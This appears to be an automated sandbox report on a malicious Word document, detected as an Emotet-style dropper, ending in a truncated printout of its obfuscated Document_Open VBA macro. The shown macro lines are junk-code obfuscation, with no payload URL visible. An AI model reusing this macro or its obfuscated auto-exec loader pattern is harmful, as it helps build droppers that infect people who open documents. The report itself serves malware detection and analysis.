Verdict: MALICIOUS
Risk Score: 262

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File

Malware Insights
The file contains a heavily obfuscated VBA macro that executes via the Document_Open auto-exec function. The macro utilizes CreateObject and Shell execution, indicative of a dropper. The ClamAV detection 'Doc.Dropper.Emodldr-6755244-0' further supports this. The script's obfuscation makes it difficult to determine the exact payload, but its intent is clearly to download and execute a secondary malicious file.
Heuristics (7)

- ClamAV: Doc.Dropper.Emodldr-6755244-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Emodldr-6755244-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46787 bytes |

SHA-256 of macros.bas: 05385abfb15c3a049be8daaba4e921caaced0f6161cc8b7f21457557d04596eb

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function XsUfIv(aumTQIo As String, evOhYW As Double, nOhycPS As Integer, jUPjptj As Boolean, CeUEFn As Double) As String
BugTKjgp = LTrim("aGqtAmmJb&YuGML[q")
ZnGknBCz = Right(")LqnIy[rhY$@", 5)
JLQtw = 645 - 768 - 1967
uBUZeFx = Right("VQrDSSOfqt", 4)
JLQtw = LTrim("BsEOJL)QLKnF$#rj!?Q")
BugTKjgp = 531 - 1147 - 1747
NBWZB = 1831 + 246 + 1623
NBWZB = RTrim("&ZYgBnGY%NDpd#^s*L(n")
eCjAai = StrReverse("O.svpIwjAP]")
dTvoRg = UCase("kHaDCP%PJhpoq")
nQOid = Left("Su&[FjQ @jIn s", 2)
uBUZeFx = RTrim("J WNTlNvXw^o_Q-PJ.")
nQOid = LTrim("VEoe?jMFKK$sdlh&")
eCjAai = UCase("C^p UEB#gSOl_")
TmKMRPD = 481 + 927 + 665
nQOid = 359 - 382 - 277
NBWZB = StrReverse("[PnDXb_voB_LEm*DU)")
JLQtw = Left("*HH&Xe*TdivR!_eCra]", 2)
dTvoRg = RTrim("VbdSEzjzEsH&MGlK")
uBUZeFx = Right("y]l]GpU((Fbho", 5)
ZnGknBCz = UCase("ryN^%os(vQ-*IuX")
BugTKjgp = Left("X)tXn_wl$$", 3)
hNoap = 1155 - 100 - 1970
eCjAai = Right("*I)X&S*Qs@?ekYq", 5)
For QyRigy = 0 To 316
NBWZB = StrReverse("!JpmJrgarFQHem")
BugTKjgp = LTrim("@IW).u.XpQNvV")
NBWZB = LTrim("uk)]diD$)EjFMrUoxdcB")
nQOid = UCase("ypSVOcMADrsaA")
nQOid = "AAIIUqCtFmM?L[" + "Uy?mwYh?vW[pccjSv" + "]RrmA#*XQAAVHw]XLPG"
uBUZeFx = "v$yBluBHEsaQN$Y$H]%R" + "_C) CFf!ZilP%]msNHVX" + " NrjYS&A[uO)gWK#%wvJ"
Next QyRigy
DdFFiBCF = 1464 + 1073 + 1212
TmKMRPD = Right("ZTz&fq^[qhq", 4)
ZnGknBCz = StrReverse("lB .Bn-mNxheG ")
nQOid = 1789 + 872 + 568
TmKMRPD = Left("xuvLy%U!aEjUrN@", 5)
ZnGknBCz = "vKjfwZlE])" + "bTr)hni!PVn*S]hk#" + "#eu)v^euUtjey"
eCjAai = 1213 + 624 + 1019
nQOid = Left("i[jy& cNP_UqnU)mRM&", 5)
DdFFiBCF = " (hhO]g-%.Xjm.d F%x" + "uWAZxgo$jrn xL" + "]q]UPwp%n(j$CQBZ_Tu("
NBWZB = RTrim("SGJ$QOa$VR?Wp")
TmKMRPD = Space(19)
XsUfIv = "cdhTnEGdQVnfCMMYvMUQdUUaDveRIBYvFpyM"
End Function
Private Sub fCUfhMAWkC(fCuMFnR As String, CKXPuL As String, IaLCofZ As String, cbkMlk As String, ucDhgN As String, hiyFkZ As String, xHdLcwE As String)
DdFFiBCF = LTrim("bl M#$Kr.^g(eQIro")
ZnGknBCz = UCase("(m](TRD!y[qr]Rp^")
JLQtw = RTrim("% PghfoL*Z-)t-O")
ZnGknBCz = 789 + 1876 + 220
uBUZeFx = "KWi[OSAIn[.$yHAxDIv" + "tTz^^qb^ziMMl" + "vcPo*NxvjoeyAMpYW#m"
ZnGknBCz = LTrim("FsznyKVjoP")
ZnGknBCz = Space(3)
eCjAai = RTrim("G]eZKOypSJ)QTnZk*Y")
DdFFiBCF = Space(16)
ZnGknBCz = 1195 + 1392 + 611
nQOid = 997 + 1450 + 1525
BugTKjgp = "%yFTxrRkr$" + "HAiGMG?f(oLPXk" + "$BabI@Mx$ug%&VJU"
eCjAai = StrReverse("HbUBzHxUeG")
ZnGknBCz = Left("SxK_xHJHsxXnC?#", 5)
nQOid = 1071 - 1917 - 582
For VThmIr = 0 To 127
dTvoRg = StrReverse("U^Fy[N&DvdBaI?oX")
ZnGknBCz = LTrim("MWqPeIN@Fogsy]jlr]_")
uBUZeFx = UCase("rJfiGFDWim_")
ZnGknBCz = Right("fb#a?V& jviTGu_", 2)
eCjAai = Space(20)
TmKMRPD = "Ja!*[jC)![A]q@MFOAi" + "eU@FuJh*eUge&Bm" + "!CavWiJA@?QWT"
eCjAai = 123 - 837 - 1154
hNoap = 930 + 584 + 625
hNoap = StrReverse("dJkFsER[Zq.!Lx[(")
Next VThmIr
uBUZeFx = Left("yK!twbKRZZBGA", 5)
eCjAai = Space(7)
JLQtw = 804 + 594 + 989
NBWZB = Right("Fv@Ahx-mx-A#", 4)
For hwcmWU = 0 To 32
nQOid = LTrim("#i*pd*s EiY^")
BugTKjgp = Space(6)
hNoap = Right("JfhsKDHecD", 5)
hNoap = Space(13)
nQOid = 1625 + 143 + 1738
Next hwcmWU
NBWZB = 180 - 342 - 1959
DdFFiBCF = RTrim("x]qdlv?NlntNsNErX")
While ECWrrp < 395
NBWZB = Space(10)
JLQtw = Left("(vF]r^pb.Qsy-e", 4)
DdFFiBCF = LTrim("?f[*wD]LfE ih@#K]_LL")
ECWrrp = ECWrrp + 2
Wend
... (truncated)